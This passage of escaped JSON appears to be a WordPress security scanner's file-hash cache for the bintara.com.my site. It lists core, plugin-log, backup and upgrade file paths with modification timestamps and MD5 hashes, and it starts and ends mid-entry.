8cf9bb5d891174bc64525\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-block-type.php\":{\"d\":1542802488,\"h\":\"99a654085db59c78efffaf91f9131d01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/http.php\":{\"d\":1522760742,\"h\":\"6a6a3766b98d39fad2eb614ad8a4f441\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-widget-factory.php\":{\"d\":1501107104,\"h\":\"4c90b9d7dd0bdf79739e50c98aa25095\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-image-editor.php\":{\"d\":1539236484,\"h\":\"091eae38fe3551e2bc8f5d06440c53b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme.php\":{\"d\":1540345600,\"h\":\"4abe03f8ef47b6f3473c277b4da54663\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/blocks.php\":{\"d\":1542820190,\"h\":\"98dbd173959dfdd233f5fec46a9cbdfd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-requests-response.php\":{\"d\":1501107104,\"h\":\"884bad87875d890f9db7637bf383a47a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-requests-hooks.php\":{\"d\":1498919322,\"h\":\"aa3272d047c217607e311ec06ec308bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-user.php\":{\"d\":1506537646,\"h\":\"90459b5ed478eccee96402c919d2e45f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-customize-manager.php\":{\"d\":1547081533,\"h\":\"52fc7189a79e1b68d3f4dc4b3698a8dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/spl-autoload-compat.php\":{\"d\":1501195552,\"h\":\"5fa0ee4ca7705a26dba5978bef68e975\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-ajax-response.php\":{\"d\":1501107104,\"h\":\"34c6876f7f5f919de1ba69960cddc32c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-hook.php\":{\"d\":1505979048,\"h\":\"ab7c1eac9f4a1faf66083ecc7e91562d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-walker-nav-menu.php\":{\"d\":1508487046,\"h\":\"bd3c76b53f1671f2f9fa99ed97d08fbb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-term-query.php\":{\"d\":1539136008,\"h\":\"e43976491a453bd8327ff1f2b44f4062\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-post.php\":{\"d\":1501107104,\"h\":\"2f305d61314ad5876ed5e3035cd7e61e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/bookmark-template.php\":{\"d\":1463932468,\"h\":\"b4675b6c675004098ba08c353522ea81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-feed.php\":{\"d\":1480726842,\"h\":\"cc29246ba6bf335c20a212b3f73245b6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-blogs.php\":{\"d\":1508341430,\"h\":\"bf9dfedcdd32f924c9b86cc134e9d781\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-oembed-controller.php\":{\"d\":1540307920,\"h\":\"59ff05396c6e6c8d8f8eccb5b19a4ab7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-meta-query.php\":{\"d\":1506973486,\"h\":\"94b9553f68e9dff51de633359b5e5aa8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-comment.php\":{\"d\":1501107104,\"h\":\"39788514d1c2de76b526f17f4316427d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-simplepie-sanitize-kses.php\":{\"d\":1501107104,\"h\":\"e17821fe4623f1d6608fb11794d89703\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class.wp-dependencies.php\":{\"d\":1501107104,\"h\":\"d57b6a1487fd91db2494c7feaf332f22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-term.php\":{\"d\":1501107104,\"h\":\"4faafea3dbb8b264dc1f98d359f5a9d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-comment-query.php\":{\"d\":1540389832,\"h\":\"8f21d7bc5e359756f963c98697b97212\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/l10n.php\":{\"d\":1547081533,\"h\":\"31dd15cac22798b3b52a287087b7aa0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/taxonomy.php\":{\"d\":1540530506,\"h\":\"e8d67c139e17252a4c68214d3ecbf294\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-query.php\":{\"d\":1542924766,\"h\":\"c30c25050c0116fe3bbb45e2a238b3ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-streams.php\":{\"d\":1508330092,\"h\":\"b924109730aab06f1c10f393fec08df3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/post-formats.php\":{\"d\":1503250434,\"h\":\"32d4f4e47b76e3be71a9355d06181efc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-customize-setting.php\":{\"d\":1501107104,\"h\":\"56eb027b927ffe16bb9381252a03c9ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-editor.php\":{\"d\":1547081533,\"h\":\"ade6b639b1749412f232ea6b7b3b0759\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/functions.wp-styles.php\":{\"d\":1472953168,\"h\":\"e665e24a159238e25a805717db32fb98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/media-template.php\":{\"d\":1540530706,\"h\":\"4e15cd2f0cbb05fb0933390bbcff0000\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-http-response.php\":{\"d\":1507034926,\"h\":\"2e5489b7340c2c5b4acedcd186a940da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/default-constants.php\":{\"d\":1540304500,\"h\":\"280259082082015b286650b41dfd351a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-IXR.php\":{\"d\":1472652090,\"h\":\"32ac76bea2307022852b2f7a62c60c2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/feed-rss2.php\":{\"d\":1481861560,\"h\":\"f1222c983dd4009dd31e0e64ec7b0537\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rewrite.php\":{\"d\":1507323592,\"h\":\"987db80759edfd2aae9316162a3d7bda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rss.php\":{\"d\":1477886312,\"h\":\"c21d6d86e75bef00fa6c4a0ec5e1ca3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/meta.php\":{\"d\":1539594986,\"h\":\"2ada5e0b284561408bbbf756603d08a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-image-editor-gd.php\":{\"d\":1503391364,\"h\":\"6f940ce8709c2f9a12c099fbfec9c40d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/media.php\":{\"d\":1525367308,\"h\":\"eadeab0a38468e98558364114df110b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/load.php\":{\"d\":1540530506,\"h\":\"1a3b3f62869537d66ec95f19b75c9a8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ms-files.php\":{\"d\":1474997728,\"h\":\"6e5192e9e3bfbebedc13c62db1f9a013\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-customize-section.php\":{\"d\":1509160728,\"h\":\"0a310f6f65755f654cf37b0fe6c972b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/embed.php\":{\"d\":1540307920,\"h\":\"fb80f7ef7a72440f8a77075bcc7d752e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-phpmailer.php\":{\"d\":1484088822,\"h\":\"3eff9ed4b6cadf990b4f238ed91c5ade\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rss-functions.php\":{\"d\":1467799830,\"h\":\"19ff1fae31fd2d0338c7601bcb4baf58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/feed-atom.php\":{\"d\":1481861382,\"h\":\"18d0b3c5403170bc59a0ccda505534fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/nav-menu-template.php\":{\"d\":1499281304,\"h\":\"90d3335eaffac4aea1f3d9d0967f5c9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-embed.php\":{\"d\":1508877648,\"h\":\"dc585b8ff55341bd21e573696ea76192\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-text-diff-renderer-inline.php\":{\"d\":1472137650,\"h\":\"994486a99255b5b110d9551bbf763fc7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/wp-diff.php\":{\"d\":1472652090,\"h\":\"b8d2a2f2f34943b684b7e0250d342c2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/class-wp-taxonomy.php\":{\"d\":1501107104,\"h\":\"7d2c5249413cbac724b400e500f2ab64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/log.b45c3f15636f.txt\":{\"d\":1547033459,\"h\":\"bf3d7021d59fceaec046ce209e019cf7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-themes.zip\":{\"d\":1547032161,\"h\":\"1d7727d3313fec4340d0947ec474e606\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-db.gz\":{\"d\":1547032884,\"h\":\"dd73a93ebbe446923c9d2e911e1ed870\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-others.zip\":{\"d\":1547032878,\"h\":\"7e62cb01b6cf58a13cbb505b5e2740ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/index.html\":{\"d\":1544778380,\"h\":\"7645f25405ae2d31a5c96c306891bea0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-uploads.zip\":{\"d\":1547032868,\"h\":\"43928c7b82378802f41aa4f3f505af1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/.htaccess\":{\"d\":1544778380,\"h\":\"5cc8a02be988615b049f5abecba2f3a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/log.3159b7f94083.txt\":{\"d\":1546600342,\"h\":\"e0d8b4cf8d33db9693f425869d76bb18\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-plugins.zip\":{\"d\":1547032158,\"h\":\"d786baeb708a72443eaa77eca6f45d72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/updraft\\/web.config\":{\"d\":1544778380,\"h\":\"67da82c8c78834859f36bffd79337138\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/config-livewaf.php\":{\"d\":1547088869,\"h\":\"70fcab41dda6c5dfffb86e6518e02c3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/rules.php\":{\"d\":1546523148,\"h\":\"60365614831fbb259e613304e227f044\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/ips.php\":{\"d\":1547088868,\"h\":\"6c43a40c1b64628def2ea7cbb4eb8376\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/GeoLite2-Country.mmdb\":{\"d\":1544708065,\"h\":\"58cc2072ccd47e839b06c14c193461f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/attack-data.php\":{\"d\":1546965252,\"h\":\"23d8ad0abeeec5798f490262bd0ddb0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/config-synced.php\":{\"d\":1547090046,\"h\":\"7f8182b22af1d9902a2a6afdecbe6241\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/.htaccess\":{\"d\":1547085221,\"h\":\"3a5256a7d7e3962aabb4624c518ff5f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/template.php\":{\"d\":1544708065,\"h\":\"6c43a40c1b64628def2ea7cbb4eb8376\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/config.php\":{\"d\":1545355183,\"h\":\"6c7bcaa378e0c4efc41a57b82e01ce6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/wflogs\\/config-transient.php\":{\"d\":1547046175,\"h\":\"623d0e7dcbc53cf19d7f79a57c627e61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/ai1wm-backups\\/.htaccess\":{\"d\":1545638533,\"h\":\"02586ce7de99b1b3de89687a07251a04\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/ai1wm-backups\\/index.php\":{\"d\":1545638533,\"h\":\"7dc6dad897b701b3d3dc016b6c648dfc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/ai1wm-backups\\/web.config\":{\"d\":1545638533,\"h\":\"d9946da4e0e1287754a1b2d14e821b0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/editor\\/style.css\":{\"d\":1547081509,\"h\":\"59d50c0db9d21f6a092e347714520c01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/editor\\/style-rtl.min.css\":{\"d\":1547081509,\"h\":\"ab6108c21a2a1d14df1dc9f0d49827d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/editor\\/style-rtl.css\":{\"d\":1547081509,\"h\":\"54a9556e4830fb69925ad216617c5aad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/editor\\/style.min.css\":{\"d\":1547081509,\"h\":\"c16f103ecb87682ba3b40546bd0568ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/block-library\\/style.css\":{\"d\":1547081509,\"h\":\"b57c9841759fb679653e42162a9218c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/block-library\\/style-rtl.min.css\":{\"d\":1547081509,\"h\":\"d853d590816c08875d95849875e42648\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/block-library\\/style-rtl.css\":{\"d\":1547081509,\"h\":\"76adcd3fae217c56e6fc3ff97257a3b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/block-library\\/style.min.css\":{\"d\":1547081509,\"h\":\"eb1a96949e0ea0d08033d3f941bf1f3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/components\\/style.css\":{\"d\":1547081509,\"h\":\"ceaf3c35802604ba2964561a5c15cafd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/components\\/style-rtl.min.css\":{\"d\":1547081509,\"h\":\"c1b549e7ed316bf5a1d38d545923230e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/components\\/style-rtl.css\":{\"d\":1547081509,\"h\":\"23207926b6554158a37d95234a23414f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/css\\/dist\\/components\\/style.min.css\":{\"d\":1547081509,\"h\":\"50242e6ba592897625683280e2cc183d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/core-data.js\":{\"d\":1547081512,\"h\":\"d9d282309deba0fae8e0d9e1390bb2a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/hooks.js\":{\"d\":1547081516,\"h\":\"d1495ca6445d4be01ea2c604ffad2c91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/blocks.min.js\":{\"d\":1547081512,\"h\":\"f39f38665ac6b784630b3f652375580b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/data.js\":{\"d\":1547081512,\"h\":\"8a70f593b4e1c7255d1477a5b943de61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/block-library.js\":{\"d\":1547081509,\"h\":\"f8dd79f25b1b88b0dac790416138a00a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/editor.min.js\":{\"d\":1547081516,\"h\":\"6191d588e62256e25a4e735c318b5ab0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/url.min.js\":{\"d\":1547081516,\"h\":\"4d6c78efb41747c864b4dc24c5c7f939\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/url.js\":{\"d\":1547081516,\"h\":\"026d66222af818d4aab9a2059165b064\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/viewport.min.js\":{\"d\":1547081516,\"h\":\"d7932636c66dd528dc7fd98caa7a607e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/edit-post.min.js\":{\"d\":1547081512,\"h\":\"7423dbf596bd505ff600ab11c69d15c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/data.min.js\":{\"d\":1547081512,\"h\":\"07c02f5b612470483def32a975cd96cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/dom.min.js\":{\"d\":1547081512,\"h\":\"a2f3f8a8d0643c3fef95f4c59b78472a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/components.js\":{\"d\":1547081512,\"h\":\"51965929307297ed0ef5e9ad07709dfa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/hooks.min.js\":{\"d\":1547081516,\"h\":\"372901e50eb2d47eb24cb57a62aaa7f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/components.min.js\":{\"d\":1547081512,\"h\":\"84cdfb957f060ba494e4a5178672c106\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/viewport.js\":{\"d\":1547081516,\"h\":\"ea43d42792f43b764449b2618693c069\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/editor.js\":{\"d\":1547081516,\"h\":\"dc9f3b6295f11d544425284077dbe77f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/edit-post.js\":{\"d\":1547081512,\"h\":\"3a8f886d748dd1bc6390f29b8b1cc909\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/core-data.min.js\":{\"d\":1547081512,\"h\":\"73143e8195b1151c70875f1f7717e778\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/dom.js\":{\"d\":1547081512,\"h\":\"0da7a6c0a8988d47b4cbc451ed68e712\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/block-library.min.js\":{\"d\":1547081512,\"h\":\"3d87ea3fd4d155e3f8d0e1e96cea6256\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/dist\\/blocks.js\":{\"d\":1547081512,\"h\":\"e66a65abca2667e9478f1298b964be52\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/wplink.min.js\":{\"d\":1547081516,\"h\":\"caec3c62a9d482aea3a07473ba2fc765\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/js\\/wplink.js\":{\"d\":1547081516,\"h\":\"ad293791760966322c4dda8bc3329848\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/version.php\":{\"d\":1547081509,\"h\":\"28603c0ed70fa15ac2c13e62b4de6b9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/functions.php\":{\"d\":1547081516,\"h\":\"10bd4b1d23b8a574eaf862c1eab5c3d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/class.wp-scripts.php\":{\"d\":1547081516,\"h\":\"905ab60f4cdecba560c6945e5ecb3528\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/class-wp-customize-widgets.php\":{\"d\":1547081516,\"h\":\"55d48dafd3ed4970fc4fe91893c4eeba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/script-loader.php\":{\"d\":1547081516,\"h\":\"520380d7517b8677fabb68c24f67d2ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/class-wp-block-parser.php\":{\"d\":1547081516,\"h\":\"9d496084cdae11ed52e84f10f21ebbe1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/class-wp-customize-manager.php\":{\"d\":1547081516,\"h\":\"52fc7189a79e1b68d3f4dc4b3698a8dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/l10n.php\":{\"d\":1547081516,\"h\":\"31dd15cac22798b3b52a287087b7aa0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-includes\\/class-wp-editor.php\":{\"d\":1547081516,\"h\":\"ade6b639b1749412f232ea6b7b3b0759\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/css\\/common-rtl.min.css\":{\"d\":1547081509,\"h\":\"96c50e7ed61f473ae43fea164c028c5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/css\\/common.min.css\":{\"d\":1547081509,\"h\":\"cfa9e1f2a74fb8c9181b1a4faffec319\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/css\\/common-rtl.css\":{\"d\":1547081509,\"h\":\"3056f4e370a1881381f87d058a505e13\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/css\\/common.css\":{\"d\":1547081509,\"h\":\"6488275ef0769671a1ee7f3aa57288dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/includes\\/update-core.php\":{\"d\":1547081509,\"h\":\"178d34fc4e431862fe48f1973866a790\"},\"\\/home\\/norfai